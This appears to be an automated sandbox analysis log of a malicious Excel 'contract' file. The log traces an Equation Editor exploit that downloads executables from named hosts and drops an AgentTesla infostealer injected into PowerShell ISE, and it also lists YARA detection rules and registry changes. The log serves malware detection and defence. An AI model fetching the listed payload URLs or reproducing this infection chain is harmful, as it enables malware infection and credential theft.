Source: global traffic HTTP traffic detected: GET /giving/qGTGx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pkusukoharjo.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/1001850193580392480/1002961152617222144/seven.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /htdocs/zTALg.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 136.243.86.20:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.22:49172 version: TLS 1.2

System Summary

barindex
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: sheet1.xml, type: SAMPLE Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe Jump to dropped file
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: sheet1.xml, type: SAMPLE Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTR Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Code function: 5_2_001A3540 5_2_001A3540
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Code function: 5_2_007921E2 5_2_007921E2
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: Contract - Wipak Oy.xlsx Virustotal: Detection: 53%
Source: Contract - Wipak Oy.xlsx ReversingLabs: Detection: 41%
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 536 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Code function: 6_2_001BAAB6 AdjustTokenPrivileges, 6_2_001BAAB6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Code function: 6_2_001BAA7F AdjustTokenPrivileges, 6_2_001BAA7F
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Contract - Wipak Oy.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA67B.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@8/6@2/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: Contract - Wipak Oy.xlsx OLE indicator, Workbook stream: true
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll Jump to behavior
Source: Contract - Wipak Oy.xlsx Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Contract - Wipak Oy.xlsx Static file information: File size 2819080 > 1048576
Source: Binary string: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\powershell_ise.pdbw source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: powershell_ise.pdbD source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 9C:\Win.pdbSys source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: .pdbN source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: indows\symbols\exe\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Users\Administrator\AppData\Local\Temp\2\System.Activities.pdb source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996241614.000000000060A000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000000.992431011.0000000000FF2000.00000020.00000001.01000000.00000005.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.2.dr, qGTGx[1].exe.2.dr
Source: Binary string: T3npC:\Windows\powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027185092.0000000000398000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: powershell_ise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000002.1027747753.000000000478D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: indows\powershell_ise.pdbpdbise.pdb source: powershell_ise.exe, 00000006.00000002.1027587874.0000000002276000.00000004.00000020.00020000.00000000.sdmp
Source: Contract - Wipak Oy.xlsx Initial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: qGTGx[1].exe.2.dr, Activities/Form1.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.2.dr, Activities/Form1.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.ff0000.0.unpack, Activities/Form1.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
